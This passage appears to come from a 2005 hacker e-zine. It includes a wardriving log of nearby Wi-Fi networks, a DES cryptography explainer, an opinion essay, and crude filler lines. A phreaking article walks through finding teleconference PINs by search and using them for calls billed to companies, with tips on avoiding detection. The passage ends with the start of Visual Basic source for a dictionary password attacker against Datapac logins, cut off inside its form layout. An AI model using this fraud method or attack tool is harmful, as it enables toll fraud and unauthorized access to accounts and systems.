05:36:48 2005" Last : "Wed Mar 30 05:36:48 2005" Network 26: "BSD" BSSID: "00:80:C8:2B:6F:23" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 2 First : "Wed Mar 30 05:40:25 2005" Last : "Wed Mar 30 05:41:55 2005" Network 27: "BSGWL" BSSID: "00:80:C8:24:76:89" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 03 WEP : "Yes" Maxrate : 22.0 LLC : 6 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 6 First : "Wed Mar 30 05:40:56 2005" Last : "Wed Mar 30 05:41:31 2005" Network 28: "0CP2REDS0X" BSSID: "00:A0:F8:AE:DD:B2" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 33 Data : 1 Crypt : 1 Weak : 0 Dupe IV : 0 Total : 34 First : "Wed Mar 30 05:43:35 2005" Last : "Wed Mar 30 06:08:19 2005" Network 29: "FLHGuest" BSSID: "00:0F:C8:00:7F:98" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 36.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 2 First : "Wed Mar 30 05:45:07 2005" Last : "Wed Mar 30 05:45:33 2005" Network 30: "WEMiSphere" BSSID: "00:0F:C8:00:7F:99" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 36.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:45:08 2005" Last : "Wed Mar 30 05:45:08 2005" Network 31: "5356ep" BSSID: "00:0F:C8:00:7F:9B" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 36.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:45:08 2005" Last : "Wed Mar 30 05:45:08 2005" Network 32: "linksys" BSSID: "00:90:4B:B7:F5:33" Type : probe Carrier : 802.11b Info : "None" Channel : 00 WEP : "No" Maxrate : 54.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 05:46:36 2005" Last : "Wed Mar 30 05:46:41 2005" Network 33: "5356ep" BSSID: "00:0F:C8:00:39:69" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "Yes" Maxrate : 36.0 LLC : 6 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 6 First : "Wed Mar 30 05:48:41 2005" Last : "Wed Mar 30 06:00:06 2005" Network 34: "default" BSSID: "00:0F:3D:5C:2D:92" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 11.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:49:21 2005" Last : "Wed Mar 30 06:00:24 2005" Network 35: "FLHGuest" BSSID: "00:0F:C8:00:43:18" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "No" Maxrate : 36.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 5 First : "Wed Mar 30 05:52:30 2005" Last : "Wed Mar 30 05:59:06 2005" Network 36: "55pj" BSSID: "00:05:5D:F2:25:48" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 11 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 11 First : "Wed Mar 30 05:52:51 2005" Last : "Wed Mar 30 05:55:18 2005" Network 37: "" BSSID: "00:06:25:3C:B3:C0" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 00 WEP : "No" Maxrate : 0.0 LLC : 0 Data : 1 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:53:30 2005" Last : "Wed Mar 30 05:53:30 2005" Network 38: "FLHGuest" BSSID: "00:0F:C8:00:1D:58" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 36.0 LLC : 7 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 7 First : "Wed Mar 30 05:55:00 2005" Last : "Wed Mar 30 05:59:20 2005" Network 39: "FLHGuest" BSSID: "00:0F:C8:00:39:68" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 7 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 7 First : "Wed Mar 30 05:56:34 2005" Last : "Wed Mar 30 06:00:01 2005" Network 40: "linksys" BSSID: "00:0F:66:A7:C9:97" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:56:44 2005" Last : "Wed Mar 30 05:56:44 2005" Network 41: "FLHGuest" BSSID: "00:0F:C8:00:49:28" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:56:45 2005" Last : "Wed Mar 30 05:59:59 2005" Network 42: "WEMiSphere" BSSID: "00:0F:C8:00:49:29" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 4 Data : 1 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 5 First : "Wed Mar 30 05:56:50 2005" Last : "Wed Mar 30 05:59:23 2005" Address found via TCP 10.202.1.179 Network 43: "5356ep" BSSID: "00:0F:C8:00:49:2A" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "Yes" Maxrate : 36.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 05:56:50 2005" Last : "Wed Mar 30 05:59:24 2005" Network 44: "WEMiSphere" BSSID: "00:0F:C8:00:43:19" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "No" Maxrate : 36.0 LLC : 5 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 5 First : "Wed Mar 30 05:57:19 2005" Last : "Wed Mar 30 05:59:07 2005" Network 45: "WEMiSphere_WPA1x" BSSID: "00:0F:C8:00:43:1B" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 36.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 05:57:20 2005" Last : "Wed Mar 30 05:57:51 2005" Network 46: "FLHGuest" BSSID: "00:0F:C8:00:44:38" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "No" Maxrate : 36.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 05:57:20 2005" Last : "Wed Mar 30 05:57:40 2005" Network 47: "5356ep" BSSID: "00:0F:C8:00:44:39" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 36.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:57:20 2005" Last : "Wed Mar 30 05:58:53 2005" Network 48: "FLHGuest" BSSID: "00:0F:C8:00:36:98" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 01 WEP : "No" Maxrate : 36.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:57:36 2005" Last : "Wed Mar 30 05:57:36 2005" Network 49: "5356ep" BSSID: "00:0F:C8:00:14:E9" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 36.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 05:57:44 2005" Last : "Wed Mar 30 06:00:43 2005" Network 50: "5356ep" BSSID: "00:0F:C8:00:7F:F8" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 36.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:57:46 2005" Last : "Wed Mar 30 05:57:46 2005" Network 51: "FLHGuest" BSSID: "00:0F:C8:00:7F:F9" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "No" Maxrate : 36.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:57:47 2005" Last : "Wed Mar 30 05:57:47 2005" Network 52: "WEMiSphere_WPA1x" BSSID: "00:0F:C8:00:7F:FA" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 36.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:57:47 2005" Last : "Wed Mar 30 05:57:47 2005" Network 53: "WEMiSphere" BSSID: "00:0F:C8:00:7F:FB" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "No" Maxrate : 36.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 05:57:50 2005" Last : "Wed Mar 30 05:57:50 2005" Network 54: "FLHGuest" BSSID: "00:0F:C8:00:14:E8" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "No" Maxrate : 36.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 2 First : "Wed Mar 30 06:00:06 2005" Last : "Wed Mar 30 06:00:45 2005" Network 55: "FLHGuest" BSSID: "00:0F:C8:00:1E:78" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "No" Maxrate : 36.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 06:00:37 2005" Last : "Wed Mar 30 06:00:37 2005" Network 56: "WEMiSphere" BSSID: "00:0F:C8:00:14:EA" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "No" Maxrate : 36.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 06:00:42 2005" Last : "Wed Mar 30 06:01:14 2005" Network 57: "WEMiSphere" BSSID: "00:0F:C8:00:15:11" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "No" Maxrate : 36.0 LLC : 4 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 4 First : "Wed Mar 30 06:01:23 2005" Last : "Wed Mar 30 06:02:10 2005" Network 58: "soular" BSSID: "00:11:95:54:8F:5F" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "Yes" Maxrate : 36.0 LLC : 1 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 1 First : "Wed Mar 30 06:01:27 2005" Last : "Wed Mar 30 06:01:27 2005" Network 59: "FLHGuest" BSSID: "00:0F:C8:00:15:10" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 11 WEP : "No" Maxrate : 36.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 06:01:56 2005" Last : "Wed Mar 30 06:02:58 2005" Network 60: "warehouse" BSSID: "00:90:4B:69:3C:07" Type : probe Carrier : 802.11b Info : "None" Channel : 00 WEP : "No" Maxrate : 54.0 LLC : 3 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 3 First : "Wed Mar 30 06:03:43 2005" Last : "Wed Mar 30 06:04:16 2005" Network 61: "linksys" BSSID: "00:06:25:A2:97:F6" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 2 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 2 First : "Wed Mar 30 06:04:51 2005" Last : "Wed Mar 30 06:04:51 2005" Network 62: "0CP2REDS0X" BSSID: "00:A0:F8:A8:7B:AA" Type : infrastructure Carrier : 802.11b Info : "None" Channel : 06 WEP : "Yes" Maxrate : 11.0 LLC : 14 Data : 0 Crypt : 0 Weak : 0 Dupe IV : 0 Total : 14 First : "Wed Mar 30 06:06:05 2005" Last : "Wed Mar 30 06:08:24 2005" Total Networks Found: 62 This is my first article for K-1ine, I hope you all enjoyed. -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O "9/10 doctors use Windows. When life support is on the line; who cares? Risks make life fun" - A message from the Government of Canada +-----------------------------------+ | Undressing Cryptography | | ~or~ | | How I learned to punt Eve | | and strengthen DES | | | | by aestetix | +-----------------------------------+ This is a continuation on my article "Dismantling DES" which appeared in K-1ine #44, and I'll be making certain assumptions about the reader's knowledge of the algorithm and cryptology vocabulary. When we left off from the first article, we made several sore assumptions: thinking that the only noteworthy attribute of the key is its length, that the existence of substitution boxes (s-boxes) is enough to guarantee their security, and that multiple iterations alone fastens the resilience of the algorithm. While we did explore the EFF project attacking DES's strength, we rested with satisfaction that key brute forcing was the only effective technique. In essence, we ignored any practical philosophies that crypt- analysts might use in crypto-assault. -------------------+ Death to the Keys!| -------------------+ First, let's examine the structure of keys in general. We can think of them in similar fashion to passwords: how many tricks are there to securing your password, and how many people actually use them? We have alphanumeric sugg- estions, as well as case sensitivity using non-Roman characters, but there are two harsh realities: people don't like remember complex globs of crap when they just want to do their work (or play), and schools or companies enforcing militant password regulations tend to have escrows of keys foll- owing the same format (dictionary word + number is common). How does this relate to key structure in a crypto algorithm? Well, if you are using keys composed of ASCII characters, there's usually a slim window within which the key will be found. For example, if your keys are all letters and numbers, you can set a brute-force analyzer to scan within the range of 0x30 and 0x7F. This alone eliminates nearly 30% of your spectrum. Second, there are certain patterns in key structure that will probably not occur. Would anyone prudently structure a key with repetitions like 0x5656565656? Even interlacing key combinations like 0x1F2E3D4C5B probably won't occur. The more ignorable patterns you can observe, the more efficient your key scanner will be. --------------------------+ The "S" stands for "sexy"| --------------------------+ Second, we have s-boxes.Before we run into analysis of s-box architecture, we need to introduce the "avalanche" concept. When we think of cause-effect situations, we think very directly. Because he has a car, he can drive to work. If he has a job, he will be paid for his work. This extends to crypto-thought in many ways: in a simple substitution cipher, if you change a single letter so that plaintext "B" now becomes "D" instead of "R", every instance of R in the ciphertext will change to D. However, a more secure algorithm would set it so that if you change "B", both "D" becomes "R" AND "S" becomes "T". In essence, we've changes things so that altering a single plaintext character affects the outcome of multiple ciphertext characters. Rather than a cause- effect ratio of 1:1 (1 cause : 1 effect), it becomes 1:2. According to aval- anche philosophy, the greater the ratio (1:50, 1:500), the more difficult it will be to deduct the plaintext with solely the ciphertext. But how does this relate to s-box strength? Well, if you change the s-box contents at all, how much will it affect the ultimate ciphertext you get? For example, if your s-box contains a 4*6 grid of 1 through 20, like such: +-----------+ |1 2 3 4 | |5 6 7 8 | |9 10 11 12| |13 14 15 16| |17 18 19 20| |21 22 23 24| +-----------+ it does absolutely nothing. If you reverse the order (start with 24, end with 1) it makes it slightly secure, but an amateur cryptanalyst should be able to decode it. Introduce more elements (repeat numbers, use different sequences, random number generators, etc) and the result gets more obfuscated. For example, an s-box created by the Fibbonacci sequence will have a different effect than one created by a random number generator. Moreso, different randomness algorithms will have different effects. But let's take it a step farther, incorporating the ratios: what if you change two numbers and four in the ciphertext are changed? This makes reverse engine- ering (trying to decipher the key through the cipher) far more difficult. Better yet, say we formulate the s-boxes so that making a single bit change in the plaintext changes -every- bit in the ciphertext? Now we can better understand how the avalanche effect is seen in s-boxes. In thwarting expert cryptanalysts, cycle iterations are far more useful when you have a well- designed s-box with a significant avalanche effect. Although we left them on a pale horse in the last article, s-box strength can make or break a decent algorithm. However, our DES structure is still insecure. Let's examine our current security elements: we have a key based on pseudo- random characters, with little visible pattern and isolated ASCII characters; our s-boxes, the heart of our system, is fastened with the most avalanche- inducing number generator possible; but there's still something missing. Now that we have pumped up the parts of a single cycle, we need to be concerned with the iterations themselves. This is where we get into cipher block oper- ation modes. ----------------------------+ The Four Pillars of DEStiny| ----------------------------+ As we established in the first article, DES is a block cipher, meaning that data is processed in blocks of data, rather than streamed through. For each cycle, we have a chunk of plaintext, a generated chunk of key, and a general operation mode that's performed on the entire body. There are four main modes: Electronic Codebook (ECB), Cipher Block Chaining (CBC), Cipher Feedback (CFB), and Output Feedback (OFB). ECB is the default mode we've been using so far, amply named because, as each cycle uses a fresh plaintext input and key, mul- tiple cycles essentially generate a "code book" where each chunk can be traced to its ciphertext. Good for explanation, but dreadful for security. CBC makes DES somewhat more secure. With CBC, the output ciphertext of the cycle is xored with the input plaintext of the next cycle before the encryption process occurs. Let's look at a diagram to illustrate this point: -~+ CIPHER BLOCK CHAINING MODE +~- Output Input Input from current next previous PT PT | | | +---->------+ (xor) +---+ (xor) | | | +------------+ | +--------+ | DES | | |next DES| key ->-| encrypt | | | encrypt| +------------+ | +--------+ | | | CT +-->-------+ +--next CT Of course, this picture assumes we're in the middle of multiple cycles. The main point to remember is that the output from the previous cycle becomes part of the input for the next. To clarify: if you're mixing meat and tomato sauce, the output will be spaghetti sauce. The sauce then becomes input for the pasta you've prepared, and the cooking algorithm creates an Italian dinner :) The xoring process creates a link between the cycles, so that instead of being able to use a plaintext/key chunk and have a corresponding ciphertext, each subsequent cycle will change depending on the order. Thus, instead of having a code book of cycles, we have a system that's chained together, where each cycle is dependant on the others. Remember that aval- anching concept? ;) This makes the system more secure on a level parallel to a Vernam cipher. CFB, on the other hand, takes the next step and applies a cycling shift register scheme. To get an idea of how this works, let's first imagine two wheels-- a large wheel and a small wheel-- rotating at the same speed. If you draw a chalk mark on the edge of each wheel, you'll notice that as they rotate, the chalk mark on the smaller wheel seems to rotate much more quickly. This is because the mark on the big wheel has much more ground to cover, and a single rotation of the small wheel doesn't provide enough time for the big mark to finish. Here's how this relates to CFB: we actually have -two- different operations going on at the same time-- the typical shifting going on inside each cycle, and an additional shift operation mixed with the cyclic xor that rotates a small amount (let's say 8 bits) per cycle. Once again, a picture should help clarify that jargon: -~+ Cipher Feedback Mode +~- Last Cycle +--------------+ +-------+ + | Shift Reg | | Next | | +----| 64-8 | 8 bits| +--| Cycle | +------------+ | +--------------+ | +-------+ | Shift Reg | | | | | 64-8|8bits | | +-----------+ | +------------+ | key--| DES | | | | | encrypt | | (xor) +-->------+ +-----------+ ^ | CT | | PT +--------------+ | | Shift Reg | |CT | 64-8 | 8 bits| | +--------------+ | | |(xor) +-->--------+------<-----PT The curious bits here involve the mysterious shift registers that have shown up before and after the DES encryption, and the "8 bits" notes everywhere. Let's watch a cycle. We draw input from the ciphertext of the previous cycle, and the leftmost (most significant) 8 bits from the ciphertext are xored with the first bit of plaintext. This is then shifted so that the xored bits become the 8 rightmost bits, and the encryption continutes. When we get back to the xoring with plaintext, we repeat the cycle of rotation until eventually all bits have been xored. Therefore, the smaller wheel, the one whose mark rotates faster, is the individual DES encryption within each cycle, while the larger wheel consists of the ultimate xoring of plaintext and input ciphertext. The final mode, OFB, is similar to the CFB mode, except that the ciphertext from the cycle is output before the xoring process with the plaintext occurs. This helps with parity, and assures that errors in tranmission don't continue to the next cycle. However, because the xoring step is removed, it makes this mode slightly more vulnerable. Overall, there are many aspects of DES which, if focused on, could be made much stronger. While there remain many criticisms, the basic techniques and thought used for cryptanalysis in this article can easily be extended onto other algorithms using similar concepts, and in general are useful for understanding both composition of and deconstruction of cryptosystems. ------------+ References:| ------------+ All the same as the first article, as well as _Handbook of Applied Cryptography_ by Menezes, van Oorschot, and Vanstone -----------+ Shoutouts:| -----------+ Thanks to The Clone, who bitched, whined, and nagged until I finally wrote this. To ProffEKS for your laptop... also to various geeks in #binrev on dalnet, se2600, mw2600, and of course #hackcanada. +-aestetix aestetix@aestetix.net http://www.aestetix.net 20 May 2005 -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O Man, My dick pumps out 90,000 megawatts of juice every day! And your boyfriends love it. The Guide to Using Google to Get Free _______ _______ __ _____ ______ / _____/ / ___ / /\ / / / ___//___ / / / / / / / / \ / / / / / / / / / / / / / /\ \/ / / _/ / / / /______ / /__/ / / / \ / / / / /___ /________//______/ /_/ \/ /_/ /_____/ Teleconferences. Confs. What are they? Essentialy they are like party lines. Dial them up, and a bunch of people might be on. Why would you want to do this? For fun, or to make prank calls where multiple people can listen, or to trade l33t codes or exchange ideas. You can also 3rd party bill with some, and you can probibly even use it as a diverter point with modems. You can dial in from one phone number, have your modem listen, then dial in from another point on the planet and get your modem to connect to it. There are more uses for teleconfs, but I'm sure most of them are obvious. In the past, people beige boxed or used COCOTs to setup teleconferences. They would dial one up, talk to the operator and tell them they would like to set up a teleconference. The operator would ask them how they would like to pay for it. The phreak would then say "I want to charge it to my number". The operator would then ask for the number, and the phreak would give them the number of the COCOT or the number of the pair they are beiging from. They would both hang up and the operator would dial the number back to make sure that the number and the person being charged is "legit". They would then be given 2 pins: the moderator pin and the user pin. The user pin is what everyone uses and the moderator pin is what the moderater uses (really hard to figgure out, eh?). The phreak would then share his conf with other people who would then dial it up. Ok, enough of what you probably already know. Here is the way we do it in the year 2005 in three easy steps: 1) Go to google 2) Google the teleconference 800 number (Example: 1-800-315-6338). 3) Sift through the results for the PIN numbers and try them to see if they work. I know many people have known about this and have been doing this for years now. This isn't exactly new stuff, but I think there are a lot of people out there who do not know about this stuff and would like to. I was doing this about a year and a half ago and am finding more hits now than I did then, well, atleast hits with pins that work anyways. In a session of searching for conf pins that worked I found 3 different confs in about an hour, and lots more results that I didnt bother to check. I mean, if you have 3 conference numbers why would you need more? Why would you even need more than one? A few notes before I close up. - I would highly recomend *NOT* using your home line for phoning confs. I have heard stories of people being _RAIDED_ just because they phoned a conf from their house. I don't know if this is true or not, but on the telephone bill they will see all numbers that dialed the conf, this I am sure of. - Try using other search engines besides google. You may find more results or different results that google doesn't show. - At night is the best time to conf/check pins because during the day there might be legitamite conferences going on, and poping onto a conf and being like "WORD UP MY FRIENDS!" and being greated by company executives is not only embarassing, but also irresponsible because the company is more likey to investigate. In a post 9/11 world, you might even be accused of industrial espionoge and/or terrorism because you phoned a conf and might have heard some executives say something confidential. - Try to see if you have moderator privlages and see if you can summon an operator. They might be able to dial out for you. - The conferences you will find will last until about the end of the month. Most conferences that are set up are set to terminate at the end of the month. This is also when the company gets their phone bill and sees all the fraudulant calls. So if you need a conf number, the best time to get one is at the very beginning of the month. Props to: Sandnigger, FatBob, NetSpread, Doc_X and The Clone. -Aftermath aftermath12345@hotmail.com -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O DON'T DRINK AND DRIVE I'm bert and I'm gert stay alert, and stay safe. The Inevitable Crash of Society Cybur Netiks (cybur_netiks@Phreaker.net) -=http://hackdaplanet.freespaces.com=- Hello, it's been a while since I wrote my last article, I have been busy, and so is everybody else it seems. I have been busy on the ridiculous number of projects I take on at once, but most people out there are busy just trying to maintain life. Now most people would think that it's not that bad, well look over your bills and pay cheques over the last few years, unless you have had some large promotion or sudden monetary gain over the past years, you will probably see how much your cost of living has gone up and your income has gone down. Now, why is this? Most people now adays simply blame it on rising fuel costs, and while this is a big part of it, it is not the only part of it. If you were to look back on history in very fine detail, you may noticethat the very basis of our society has been the same for at least 2000 years. Don't believe me? What is at the base of our economy, not fuel, not money, but people. People spend their whole lives working to put energy towards keeping society alive for just one more day, every day you get up, go to work, and lose more than half your earnings to the system. Now, we do not know of anything that is perpetual, but society pushes on with the illusion of being perpetual, but again, look back on history, every so often, society crashes (the most recent one being the 1930's) and after every crash comes a large event to start the motion all over again (world war II, now I don't blame our governments for starting it, but it was going to happen sooner or later) but again, the motion can only last so long, then comes inflation, the energy supply will wear down while the demand increases (decreased earnings, increased costs) until there is not enough energy to power the motion, then it will crash and most likely be started again. This is a fairly simple scientific and mathematical concept (the following is mostly just opinion). The US is trying something different now, they see the crash coming and are trying to avoid it from happening by boosting society now instead of after the crash, look on the news, they are picking on new countries all the time, and even plan to invade some but never do, it seems they are picking their fights, they are just picking on little guys, building up resources desperately hoping to shelter themselves from yet another crash. I can't tell you when society will crash, I am no math- ematician, but I can say this, it will happen eventually, and the hardest hit will not be the ones who have very little, but rather those who have all them money in the world. If a man who expects to lose his house any day now loses his house, it will come as little shock to him, and a man who lives on the street will barely notice the difference but a man in a upper scale riverside house who loses his well-paying job due to downsiz- ing, he will be hit very hard and will be likely to have a breakdown or even commit suicide the shock will be just too much for him to handle. So the next time you see a man asking for change on a street corner, or sorting through a trash can for a couple of bottles, don't shun him, just think, he could not be more prepared for the crash of society. Copyright (c) 2005 hackdaplanet -o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O-o-O I don't often masturbate in public Datapac Hacker's Kit: DataCrack Source Code by: Aftermath Download it at: http://www.hackcanada.com/canadian/hacking/datapac_hackers_kit.rar According to Hack Canada: "Includes the Datascan NUA scanner and the Datacrack username/password dictionary attacker for windows. VB source code included." (Notes: Form1.FRX and frmAbout.FRX excluded due to mangled code) - Form1.FRM: VERSION 5.00 Object = "{F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0"; "COMDLG32.OCX" Begin VB.Form Form1 BorderStyle = 1 'Fixed Single Caption = "DataCrack - datapac dictionary attacker" ClientHeight = 5190 ClientLeft = 405 ClientTop = 2235 ClientWidth = 8475 Icon = "Form1.frx":0000 LinkTopic = "Form1" MaxButton = 0 'False MinButton = 0 'False ScaleHeight = 5190 ScaleWidth = 8475 Begin VB.Timer Timer6 Left = 3840 Top = 1680 End Begin VB.Timer Timer5 Left = 3840 Top = 1560 End Begin VB.Frame Frame5 Caption = "Extra data to send:" Height = 5175 Left = 4440 TabIndex = 36 Top = 0 Width = 3975 Begin VB.Frame Frame8 Caption = "data to send after sending address" Height = 1335 Left = 120 TabIndex = 53 Top = 3720 Width = 3735 Begin VB.TextBox txtaddressreturn Enabled = 0 'False Height = 285 Left = 2280 TabIndex = 56 Text = "0" ToolTipText = "send this amount of return keys after extra data is sent after the address is sent" Top = 720 Width = 375 End Begin VB.TextBox txtaddress1 Height = 285 Left = 120 TabIndex = 54 ToolTipText = "put data in here that you need sent after the address has been sent" Top = 360 Width = 3495 End Begin VB.Label Label24 Caption = "time(s)" Height = 255 Left = 2760 TabIndex = 57 Top = 840 Width = 495 End Begin VB.Label Label23 Caption = "send extra Return Key(s)" Height = 255 Left = 480 TabIndex = 55 Top = 840 Width = 1815 End End Begin VB.Frame Frame7 Caption = "data to send after password is sent" Height = 1575 Left = 120 TabIndex = 38 Top = 2040 Width = 3735 Begin VB.TextBox txtpasscycle Enabled = 0 'False Height = 285 Left = 1560 TabIndex = 51 Text = "0" ToolTipText = "send this extra data ever n amount of cycles" Top = 1200 Width = 375 End Begin VB.TextBox txtpassreturn Enabled = 0 'False Height = 285 Left = 2280 TabIndex = 48 Text = "0" ToolTipText = "put the number of return keys you need to send after the extra data" Top = 720 Width = 375 End Begin VB.TextBox txtpasssend1 Height = 285 Left = 120 TabIndex = 46 ToolTipText = "put data in here that you want to be sent after the password has been sent" Top = 360 Width = 3495 End Begin VB.Label Label22 AutoSize = -1 'True Caption = "cycles" Height = 195 Left = 2160 TabIndex = 52 Top = 1200 Width = 450 End Begin VB.Label Label21 AutoSize = -1 'True Caption = "do this every" Height = 195 Left = 480 TabIndex = 50 Top = 1200 Width = 900 End Begin VB.Label Label20 Caption = "time(s)" Height = 255 Left = 2880 TabIndex = 49 Top = 840 Width = 495 End Begin VB.Label Label19 AutoSize = -1 'True Caption = "send extra Return Keys " Height = 195 Left = 480 TabIndex = 47 Top = 840 Width = 1695 End End Begin VB.Frame Frame6 Caption = "data to send after username is sent:" Height = 1695 Left = 120 TabIndex = 37 Top = 240 Width = 3735 Begin VB.TextBox txtusernamecycles Enabled = 0 'False Height = 285 Left = 1440 TabIndex = 44 Text = "0" ToolTipText = "send extra data and extra return keys every n amount of cycles" Top = 1200 Width = 375 End Begin VB.TextBox txtusernamereturn Enabled = 0 'False Height = 285 Left = 2280 TabIndex = 41 Text = "0" ToolTipText = "send n amount of return keys to the host after username and extra data is sent" Top = 720 Width = 375 End Begin VB.TextBox txtusernamesend1 Height = 285 Left = 120 TabIndex = 39 ToolTipText = "put data in here that is to be sent to terminal client after username is sent. Leave blank for no send." Top = 240 Width = 3495 End Begin VB.Label Label18 AutoSize = -1 'True Caption = "cycles" Height = 195 Left = 1920 TabIndex = 45 Top = 1200 Width = 450 End Begin VB.Label Label16 AutoSize = -1 'True Caption = "do this every" Height = 195 Left = 480 TabIndex = 43 Top = 1200 Width = 900 End Begin VB.Label Label14 AutoSize = -1 'True Caption = "time(s)" Height = 195 Left = 2760 TabIndex = 42 Top = 720 Width = 450 End Begin VB.Label Label12 AutoSize = -1 'True Caption = "send extra Return Keys" Height = 195 Left = 480 TabIndex = 40 Top = 720 Width = 1650 End End End Begin VB.CommandButton cmdstop Caption = "Stop" Default = -1 'True Height = 735 Left = 1440 TabIndex = 35 ToolTipText = "click here to reset/stop the attack" Top = 4440 Width = 1455 End Begin VB.CommandButton cmdstart Caption = "Start" Height = 735 Left = 0 TabIndex = 34 ToolTipText = "start attack" Top = 4440 Width = 